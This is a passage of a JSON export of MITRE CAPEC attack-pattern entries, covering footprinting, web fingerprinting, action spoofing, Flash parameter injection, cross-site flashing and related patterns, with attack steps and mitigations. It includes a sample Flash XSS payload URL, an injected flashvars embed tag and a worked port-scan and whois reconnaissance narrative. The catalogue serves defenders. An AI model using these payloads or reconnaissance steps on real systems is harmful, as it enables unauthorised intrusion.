MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"169":{"ID":"169","Name":"Footprinting","Abstraction":"Meta","Status":"Stable","Description":"An adversary engages in probing and exploration activities to identify constituents and properties of the target. Footprinting is a general term to describe a variety of information gathering techniques, often used by attackers in preparation for some attack. It consists of using tools to learn as much as possible about the composition, configuration, and security mechanisms of the targeted application, system or network. Information that might be collected during a footprinting effort could include open ports, applications and their versions, network topology, and similar information. Although similar to fingerprinting, footprinting aims to get a more holistic view of a system or network, whereas fingerprinting is more targeted to a specific application or operating system. While footprinting is not intended to be damaging (although certain activities, such as network scans, can sometimes cause disruptions to vulnerable applications inadvertently) it may often pave the way for more damaging attacks.","Likelihood_Of_Attack":"High","Typical_Severity":"Very Low","Execution_Flow":{"Attack_Step":{"Step":"1","Phase":"Explore","Description":"[Request Footprinting] The attacker examines the website information and source code of the website and uses automated tools to get as much information as possible about the system and organization.","Technique":["Open Source Footprinting: Examine the website about the organization and skim through the webpage\'s HTML source to look for comments.","Network Enumeration: Perform various queries (Registrar Query, Organizational Query, Domain Query, Network Query, POC Query) on the many whois databases found on the internet to identify domain names and associated networks.","DNS Interrogation: Once basic information is gathered the attack could begin to query DNS.","Other Techniques: Use ping sweep, TCP scan, UDP scan, OS Identification various techniques to gain more information about the system and network."]}},"Prerequisites":{"Prerequisite":"An application must publicize identifiable information about the system or application through voluntary or involuntary means. Certain identification details of information systems are visible on communication networks (e.g., if an adversary uses a sniffer to inspect the traffic) due to their inherent structure and protocol standards. Any system or network that can be detected can be footprinted. However, some configuration choices may limit the useful information that can be collected during a footprinting attack."},"Skills_Required":{"Skill":["The adversary knows how to send HTTP request, run the scan tool.",{"Level":"Low"}]},"Resources_Required":{"Resource":"The adversary requires a variety of tools to collect information about the target. These include port/network scanners and tools to analyze responses from applications to determine version and configuration information. Footprinting a system adequately may also take a few days if the attacker wishes the footprinting attempt to go undetected."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Mitigations":{"Mitigation":["Keep patches up to date by installing weekly or daily if possible.","Shut down unnecessary services/ports.","Change default passwords by choosing strong passwords.","Curtail unexpected input.","Encrypt and password-protect sensitive data.","Avoid including information that has the potential to identify and compromise your organization\'s security such as access to business plans, formulas, and proprietary documents."]},"Example_Instances":{"Example":"In this example let us look at the website http://www.example.com to get much information we can about Alice. From the website, we find that Alice also runs foobar.org. We type in www example.com into the prompt of the Name Lookup window in a tool, and our result is this IP address: 192.173.28.130 We type the domain into the Name Lookup prompt and we are given the same IP. We can safely say that example and foobar.org are hosted on the same box. But if we were to do a reverse name lookup on the IP, which domain will come up? www.example.com or foobar.org? Neither, the result is nijasvspirates.org. So nijasvspirates.org is the name of the box hosting 31337squirrel.org and foobar.org. So now that we have the IP, let\'s check to see if nijasvspirates is awake. We type the IP into the prompt in the Ping window. We\'ll set the interval between packets to 1 millisecond. We\'ll set the number of seconds to wait until a ping times out to 5. We\'ll set the ping size to 500 bytes and we\'ll send ten pings. Ten packets sent and ten packets received. nijasvspirates.org returned a message to my computer within an average of 0.35 seconds for every packet sent. nijasvspirates is alive. We open the Whois window and type nijasvspirates.org into the Query prompt, and whois.networksolutions.com into the Server prompt. This means we\'ll be asking Network Solutions to tell us everything they know about nijasvspirates.org. The result is this laundry list of info: Registrant: FooBar (nijasvspirates -DOM) p.o.box 11111 SLC, UT 84151 US Domain Name: nijasvspirates.ORG Administrative Contact, Billing Contact: Smith, John jsmith@anonymous.net FooBar p.o.box 11111 SLC, UT 84151 555-555-6103 Technical Contact: Johnson, Ken kj@fierymonkey.org fierymonkey p.o.box 11111 SLC, UT 84151 555-555-3849 Record last updated on 17-Aug-2001. Record expires on 11-Aug-2002. Record created on 11-Aug-2000. Database last updated on 12-Dec-2001 04:06:00 EST. Domain servers in listed order: NS1. fierymonkey.ORG 192.173.28.130 NS2. fierymonkey.ORG 64.192.168.80 A corner stone of footprinting is Port Scanning. Let\'s port scan nijasvspirates.org and see what kind of services are running on that box. We type in the nijasvspirates IP into the Host prompt of the Port Scan window. We\'ll start searching from port number 1, and we\'ll stop at the default Sub7 port, 27374. Our results are: 21 TCP ftp 22 TCP ssh SSH-1.99-OpenSSH_2.30 25 TCP smtp 53 TCP domain 80 TCP www 110 TCP pop3 111 TCP sunrpc 113 TCP ident Just by this we know that Alice is running a website and email, using POP3, SUNRPC (SUN Remote Procedure Call), and ident."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1217","Entry_Name":"Browser Bookmark Discovery"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1595","Entry_Name":"Active Scanning"}]},"References":{"Reference":[{"External_Reference_ID":"REF-31"},{"External_Reference_ID":"REF-32"},{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pp. 38-39"},{"External_Reference_ID":"REF-34","Section":"Section 3.1 Introduction, pg. 47"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Related_Weaknesses, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Description"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"170":{"ID":"170","Name":"Web Application Fingerprinting","Abstraction":"Detailed","Status":"Draft","Description":"An attacker sends a series of probes to a web application in order to elicit version-dependent and type-dependent behavior that assists in identifying the target. An attacker could learn information such as software versions, error pages, and response headers, variations in implementations of the HTTP protocol, directory structures, and other similar information about the targeted service. This information can then be used by an attacker to formulate a targeted attack plan. While web application fingerprinting is not intended to be damaging (although certain activities, such as network scans, can sometimes cause disruptions to vulnerable applications inadvertently) it may often pave the way for more damaging attacks.","Likelihood_Of_Attack":"High","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"541"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Request fingerprinting] Use automated tools or send web server specific commands to web server and wait for server\'s response.","Technique":"Use automated tools or send web server specific commands to web server and then receive server\'s response."},{"Step":"2","Phase":"Experiment","Description":"[Increase the accuracy of server fingerprinting of Web servers] Attacker usually needs to send several different commands to accurately identify the web server. Attacker can also use automated tools to send requests to the server. The responses of the server may be different in terms of protocol behavior.","Technique":["Observe the ordering of the several HTTP response headers. The ordering of the header of each server may have unique identities.","Send bad requests or requests of nonexistent pages to the server.","Attacker takes existing automated tools to recognize the type and the version of the web server in use."]},{"Step":"3","Phase":"Experiment","Description":"[Identify Web Application Software] After the web server platform software has been identified, the attacker start to identify web application technologies such as ASP, .NET, PHP and Java on the server.","Technique":["Examine the file name extensions in URL, for example .php indicates PHP script interfaced with Apache server.","Examine the HTTP Response Headers. This may leak information about software signatures","Examine Cookies that may contain server\'s software information.","Check error pages."]},{"Step":"4","Phase":"Experiment","Description":"[Identify Backend Database Version] Determining the database engine type can assist attackers\' attempt to successfully execute SQL injection. Some database API such as ODBC will show a database type as part of the driver information when reporting an error.","Technique":"Use tools to send bogus SQL query to the server and check error pages."}]},"Prerequisites":{"Prerequisite":"Any web application can be fingerprinted. However, some configuration choices can limit the useful information an attacker may collect during a fingerprinting attack."},"Skills_Required":{"Skill":["Attacker knows how to send HTTP request, SQL query to a web application.",{"Level":"Low"}]},"Resources_Required":{"Resource":"While simple fingerprinting can be accomplished with only a web browser, for more thorough fingerprinting an attacker requires a variety of tools to collect information about the target. These tools might include protocol analyzers, web-site crawlers, and fuzzing tools. Footprinting a service adequately may also take a few days if the attacker wishes the footprinting attempt to go undetected."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Other","Note":"Information Leakage"}},"Mitigations":{"Mitigation":["Implementation: Obfuscate server fields of HTTP response.","Implementation: Hide inner ordering of HTTP response header.","Implementation: Customizing HTTP error codes such as 404 or 500.","Implementation: Hide URL file extension.","Implementation: Hide HTTP response header software information filed.","Implementation: Hide cookie\'s software information filed.","Implementation: Appropriately deal with error messages.","Implementation: Obfuscate database type in Database API\'s error message."]},"Example_Instances":{"Example":{"p":["An attacker sends malformed requests or requests of nonexistent pages to the server. Consider the following HTTP responses.","[REF-37]"],"div":[{"style":"margin-left:10px;","class":"informative","div":["Response from Apache 1.3.23",{"style":"color:#32498D; font-weight:bold;"}]},{"style":"margin-left:10px;","class":"informative","div":["Response from IIS 5.0",{"style":"color:#32498D; font-weight:bold;"}]}]}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"497"}},"References":{"Reference":[{"External_Reference_ID":"REF-36"},{"External_Reference_ID":"REF-37","Section":"Testing for Web Application Fingerprint (OWASP-IG-004)"},{"External_Reference_ID":"REF-38"},{"External_Reference_ID":"REF-39","Section":"WASC-45 - Fingerprinting"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Phases, References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances"}]}},"173":{"ID":"173","Name":"Action Spoofing","Abstraction":"Meta","Status":"Stable","Description":"An adversary is able to disguise one action for another and therefore trick a user into initiating one type of action when they intend to initiate a different action. For example, a user might be led to believe that clicking a button will submit a query, but in fact it downloads software. Adversaries may perform this attack through social means, such as by simply convincing a victim to perform the action or relying on a user\'s natural inclination to do so, or through technical means, such as a clickjacking attack where a user sees one interface but is actually interacting with a second, invisible, interface.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Prerequisites":{"Prerequisite":["The adversary must convince the victim into performing the decoy action.","The adversary must have the means to control a user\'s interface to present them with a decoy action as well as the actual malicious action. Simple versions of this attack can be performed using web pages requiring only that the adversary be able to host (or control) content that the user visits."]},"Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Other","Note":"Action spoofing can result in a wide variety of consequences and negatively affect all three elements of the security triad."}},"Mitigations":{"Mitigation":["Avoid interacting with suspicious sites or clicking suspicious links.","An organization should provide regular, robust cybersecurity training to its employees."]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Mitigations"}]}},"174":{"ID":"174","Name":"Flash Parameter Injection","Abstraction":"Detailed","Status":"Draft","Description":"An adversary takes advantage of improper data validation to inject malicious global parameters into a Flash file embedded within an HTML document. Flash files can leverage user-submitted data to configure the Flash document and access the embedding HTML document. These \'FlashVars\' are most often passed to the Flash file via URL arguments or from the Object or Embed tag within the embedding HTML document. If these FlashVars are not properly sanitized, an adversary may be able to embed malicious content (such as scripts) into the HTML document. The injected parameters can also provide the adversary control over other objects within the Flash file as well as full control over the parent document\'s DOM model. As such, this is a form of HTTP parameter injection, but the abilities granted to the Flash document (such as access to a page\'s document model, including associated cookies) make this attack more flexible. Flash Parameter Injection attacks can also preface further attacks such as various forms of Cross-Site Scripting (XSS) attacks in addition to Session Hijacking attacks.","Likelihood_Of_Attack":"High","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"182","Exclude_Related":{"Exclude_ID":"403"}},{"Nature":"CanAlsoBe","CAPEC_ID":"460"},{"Nature":"CanPrecede","CAPEC_ID":"63"},{"Nature":"CanPrecede","CAPEC_ID":"178"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Spider] Using a browser or an automated tool, an adversary records all instances of HTML documents that have embedded Flash files. If there is an embedded Flash file, they list how to pass global parameters to the Flash file from the embedding object.","Technique":["Use an automated tool to record all instances of URLs which have embedded Flash files and list the parameters passing to the Flash file.","Use a browser to manually explore the website to see whether the HTML document has embedded Flash files or not and list the parameters passing to the Flash file."]},{"Step":"2","Phase":"Experiment","Description":"[Determine the application susceptibility to Flash parameter injection] Determine the application susceptibility to Flash parameter injection. For each URL identified in the Explore phase, the adversary attempts to use various techniques such as DOM based, reflected, flashvars, and persistent attacks depending on the type of parameter passed to the embedded Flash file.","Technique":["When the JavaScript \'document.location\' variable is used as part of the parameter, inject \'#\' and the payload into the parameter in the URL.","When the name of the Flash file is exposed as a form or a URL parameter, the attacker injects \'?\' and the payload after the file name in the URL to override some global value.","When the arguments passed in the \'flashvars\' attributes, the attacker injects \'&\' and payload in the URL.","If some of the attributes of the <object> tag are received as parameters, the \'flashvars\' attribute is injected into the <object> tag without the creator of the Web page ever intending to allow arguments to be passed into the Flash file.","If shared objects are used to save data that is entered by the user persistent Flash parameter injection may occur, with malicious code being injected into the Flash file and executed, every time the Flash file is loaded."]},{"Step":"3","Phase":"Exploit","Description":"[Execute Flash Parameter Injection Attack] Inject parameters into Flash file. Based on the results of the Experiment phase, the adversary crafts the underlying malicious URL containing injected Flash parameters and submits it to the web server. Once the web server receives the request, the embedding HTML document will controllable by the adversary.","Technique":"Craft underlying malicious URL and send it to the web server to take control of the embedding HTML document."}]},"Skills_Required":{"Skill":["The attacker need inject values into the global parameters to the Flash file and understand the parent HTML document DOM structure. The attacker needs to be smart enough to convince the victim to click on their crafted link.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"The attacker must convince the victim to click their crafted link."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other","Note":"Information Leakage"},{"Scope":"Authorization","Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"}]},"Mitigations":{"Mitigation":"User input must be sanitized according to context before reflected back to the user. The JavaScript function \'encodeURI\' is not always sufficient for sanitizing input intended for global Flash parameters. Extreme caution should be taken when saving user input in Flash cookies. In such cases the Flash file itself will need to be fixed and recompiled, changing the name of the local shared objects (Flash cookies)."},"Example_Instances":{"Example":{"p":["The following are examples for different types of parameters passed to the Flash file.","If an unsuspecting user is lured by an attacker to click on link like this: http://example.com/vulnerable.swf?flashfile=javascript:alert(document.domain)","The result will be not merely a one-time execution of the JavaScript code in the victim\'s browser in the context of the domain with the vulnerable Flash file, but every time the Flash is loaded, whether by direct reference or embedded inside the same domain, the JavaScript will be executed again."],"div":[{"style":"margin-left:10px;","div":["DOM-based Flash parameter injection",{"style":"color:#32498D; font-weight:bold;"},"<object>",{"style":"margin-left:10px;","div":["<embed src=\\"myFlash.swf\\" flashvars=\\"location=http://example.com/index.htm#&globalVar=e-v-i-l\\"></embed>",{"style":"margin-left:10px;"}]}]},{"style":"margin-left:10px;","class":"informative","div":["Passing parameter in an embedded URI",{"style":"color:#32498D; font-weight:bold;"}]},{"style":"margin-left:10px;","class":"informative","div":["Passing parameter in flashvars",{"style":"color:#32498D; font-weight:bold;"}]},{"style":"margin-left:10px;","class":"informative","div":["Persistent Flash Parameter Injection",{"style":"color:#32498D; font-weight:bold;"},{"i":"// Create a new shared object or read an existing one"},{"style":"margin-left:10px;","div":[{"i":"// Check whether there is a shared object saved"},{"style":"margin-left:10px;","div":{"i":"// Set a default"}},{"style":"margin-left:10px;","div":{"i":"// Read the flash file to load from the shared object"}}]},{"i":"// Store the flash file\'s name in the shared object"},{"i":"// Load the flash file"}]}]}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"88"}},"References":{"Reference":[{"External_Reference_ID":"REF-40"},{"External_Reference_ID":"REF-560"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Phases, Description Summary, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Description, Example_Instances, Execution_Flow, References, Related_Attack_Patterns, Related_Weaknesses, Skills_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow, Skills_Required"}]}},"175":{"ID":"175","Name":"Code Inclusion","Abstraction":"Meta","Status":"Stable","Description":"An adversary exploits a weakness on the target to force arbitrary code to be retrieved locally or from a remote location and executed. This differs from code injection in that code injection involves the direct inclusion of code while code inclusion involves the addition or replacement of a reference to a code file, which is subsequently loaded by the target and used as part of the code of some application.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Very High","Prerequisites":{"Prerequisite":["The target application must include external code/libraries that are executed when the application runs and the adversary must be able to influence the specific files that get included.","The victim must run the targeted application, possibly using the crafted parameters that the adversary uses to identify the code to include."]},"Resources_Required":{"Resource":"The adversary may need the capability to host code modules if they wish their own code files to be included."},"Example_Instances":{"Example":"One example of this type of attack pattern is PHP file include attacks where the parameter of an include() function is set by a variable that an attacker is able to control. The result is that arbitrary code could be loaded into the PHP application and executed."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"829"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Activation_Zone, Attack_Prerequisites, Description Summary, Examples-Instances, Injection_Vector, Payload, Payload_Activation_Impact, Related_Weaknesses, Resources_Required, Typical_Likelihood_of_Exploit"}}},"176":{"ID":"176","Name":"Configuration/Environment Manipulation","Abstraction":"Meta","Status":"Draft","Description":"An attacker manipulates files or settings external to a target application which affect the behavior of that application. For example, many applications use external configuration files and libraries - modification of these entities or otherwise affecting the application\'s ability to use them would constitute a configuration/environment manipulation attack.","Typical_Severity":"Medium","Prerequisites":{"Prerequisite":"The target application must consult external files or configuration controls to control its execution. All but the very simplest applications meet this requirement."},"Resources_Required":{"Resource":"The attacker must have the access necessary to affect the files or other environment items the targeted application uses for its operations."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"15"},{"CWE_ID":"1233"},{"CWE_ID":"1234"},{"CWE_ID":"1304"},{"CWE_ID":"1328"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Setting Manipulation"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Weaknesses, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}],"Previous_Entry_Name":["Configuration/Environment manipulation",{"Date":"2015-11-09"}]}},"177":{"ID":"177","Name":"Create files with the same name as files protected with a higher classification","Abstraction":"Detailed","Status":"Draft","Description":"An attacker exploits file location algorithms in an operating system or application by creating a file with the same name as a protected or privileged file. The attacker could manipulate the system if the attacker-created file is trusted by the operating system or an application component that attempts to load the original file. Applications often load or include external files, such as libraries or configuration files. These files should be protected against malicious manipulation. However, if the application only uses the name of the file when locating it, an attacker may be able to create a file with the same name and place it in a directory that the application will search before the directory with the legitimate file is searched. Because the attackers\' file is discovered first, it would be used by the target application. This attack can be extremely destructive if the referenced file is executable and/or is granted special privileges based solely on having a particular name.","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"17"}},"Prerequisites":{"Prerequisite":["The target application must include external files. Most non-trivial applications meet this criterion.","The target application does not verify that a located file is the one it was looking for through means other than the name. Many applications fail to perform checks of this type.","The directories the target application searches to find the included file include directories writable by the attacker which are searched before the protected directory containing the actual files. It is much less common for applications to meet this criterion, but if an attacker can manipulate the application\'s search path (possibly by controlling environmental variables) then they can force this criterion to be met."]},"Resources_Required":{"Resource":"The attacker must have sufficient access to place an arbitrarily named file somewhere early in the application\'s search path."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"706"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1036","Entry_Name":"Masquerading"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Prerequisites, References, Related_Attack_Patterns, Related_Weaknesses"}]}},"178":{"ID":"178","Name":"Cross-Site Flashing","Abstraction":"Detailed","Status":"Draft","Description":"An attacker is able to trick the victim into executing a Flash document that passes commands or calls to a Flash player browser plugin, allowing the attacker to exploit native Flash functionality in the client browser. This attack pattern occurs where an attacker can provide a crafted link to a Flash document (SWF file) which, when followed, will cause additional malicious instructions to be executed. The attacker does not need to serve or control the Flash document. The attack takes advantage of the fact that Flash files can reference external URLs. If variables that serve as URLs that the Flash application references can be controlled through parameters, then by creating a link that includes values for those parameters, an attacker can cause arbitrary content to be referenced and possibly executed by the targeted Flash application.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"182"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identification] Using a browser or an automated tool, an attacker records all instances of URLs (or partial URL such as domain) passed to a flash file (SWF).","Technique":["Use an automated tool to record the variables passed to a flash file.","Use a browser to manually explore the website and analyze how the flash file receive variables, e.g. JavaScript using SetVariable/GetVariable, HTML FlashVars param tag, etc.","Use decompilers to retrieve the flash source code and record all user-controllable variables passed to a loadMovie* directive."]},{"Step":"2","Phase":"Experiment","Description":"[Attempt to inject a remote flash file] The attacker makes use of a remotely available flash file (SWF) that generates a uniquely identifiable output when executed inside the targeted flash file.","Technique":"Modify the variable of the SWF file that contains the remote movie URL to the attacker controlled flash file."},{"Step":"3","Phase":"Exploit","Description":"[Access or Modify Flash Application Variables] As the attacker succeeds in exploiting the vulnerability, they target the content of the flash application to steal variable content, password, etc.","Technique":["Develop malicious Flash application that is injected through vectors identified during the Experiment Phase and loaded by the victim browser\'s flash plugin and sends document information to the attacker.","Develop malicious Flash application that is injected through vectors identified during the Experiment Phase and takes commands from an attacker\'s server and then causes the flash application to execute appropriately."]},{"Step":"4","Phase":"Exploit","Description":"[Execute JavaScript in victim\'s browser] When the attacker targets the current flash application, they can choose to inject JavaScript in the client\'s DOM and therefore execute cross-site scripting attack.","Technique":"Develop malicious JavaScript that is injected from the rogue flash movie to the targeted flash application through vectors identified during the Experiment Phase and loaded by the victim\'s browser."}]},"Prerequisites":{"Prerequisite":"The targeted Flash application must reference external URLs and the locations thus referenced must be controllable through parameters. The Flash application must fail to sanitize such parameters against malicious manipulation. The victim must follow a crafted link created by the attacker."},"Skills_Required":{"Skill":["knowledge of Flash internals, parameters and remote referencing.",{"Level":"Medium"}]},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Authorization","Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":"Gain Privileges"},{"Scope":["Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"}]},"Mitigations":{"Mitigation":["Implementation: Only allow known URL to be included as remote flash movies in a flash application","Configuration: Properly configure the crossdomain.xml file to only include the known domains that should host remote flash movies."]},"Example_Instances":{"Example":"The attacker tries to get their malicious flash movie to be executed in the targeted flash application. The malicious file is hosted on the attacker.com domain and the targeted flash application is hosted on example.com The crossdomain.xml file in the root of example.com allows all domains and no specific restriction is specified in the targeted flash application. When the attacker injects their malicious file in the vulnerable flash movie, the rogue flash application is able to access internal variables and parameter of the flash movie."},"References":{"Reference":[{"External_Reference_ID":"REF-41"},{"External_Reference_ID":"REF-42","Section":"Testing for Cross site flashing"},{"External_Reference_ID":"REF-561"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Consequences, References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances, Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References"}]}},"179":{"ID":"179","Name":"Calling Micro-Services Directly","Abstraction":"Standard","Status":"Draft","Description":"An attacker is able to discover and query Micro-services at a web location and thereby expose the Micro-services to further exploitation by gathering information about their implementation and function. Micro-services in web pages allow portions of a page to connect to the server and update content without needing to cause the entire page to update. This allows user activity to change portions of the page more quickly without causing disruptions elsewhere. However, these micro-services may not be subject to the same level of security review as other forms of content. For example, a micro-service that posts requests to a server that are turned into SQL queries may not adequately protect against SQL-injection attacks. As a result, micro-services may provide another vector for a range of attacks. It should be emphasized that the presence of micro-services does not necessarily make a site vulnerable to attack, but they do provide additional complexity to a web page and therefore may contain vulnerabilities that support other attack patterns.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"554"}},"Prerequisites":{"Prerequisite":"The target site must use micro-services that interact with the server and one or more of these micro-services must be vulnerable to some other attack pattern."},"Resources_Required":{"Resource":"The attacker usually needs to be able to invoke micro-services directly in order to control the parameters that are used in their attack. The attacker may require other resources depending on the nature of the flaw in the targeted micro-service."},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},"Previous_Entry_Name":["Discovering, querying, and finally calling micro-services, such as w/ AJAX",{"Date":"2015-12-07"}]}},"180":{"ID":"180","Name":"Exploiting Incorrectly Configured Access Control Security Levels","Abstraction":"Standard","Status":"Draft","Description":"An attacker exploits a weakness in the configuration of access controls and is able to bypass the intended protection that these measures guard against and thereby obtain unauthorized access to the system or network. Sensitive functionality should always be protected with access controls. However configuring all but the most trivial access control systems can be very complicated and there are many opportunities for mistakes. If an attacker can learn of incorrectly configured access security settings, they may be able to exploit this in an attack. Most commonly, attackers would take advantage of controls that provided too little protection for sensitive activities in order to perform actions that should be denied to them. In some circumstances, an attacker may be able to take advantage of overly restrictive access control policies, initiating denial of services (if an application locks because it unexpectedly failed to be granted access) or causing other legitimate actions to fail due to security. The latter class of attacks, however, is usually less severe and easier to detect than attacks based on inadequate security restrictions. This attack pattern differs from CAPEC 1, \\"Accessing Functionality Not Properly Constrained by ACLs\\" in that the latter describes attacks where sensitive functionality lacks access controls, where, in this pattern, the access control is present, but incorrectly 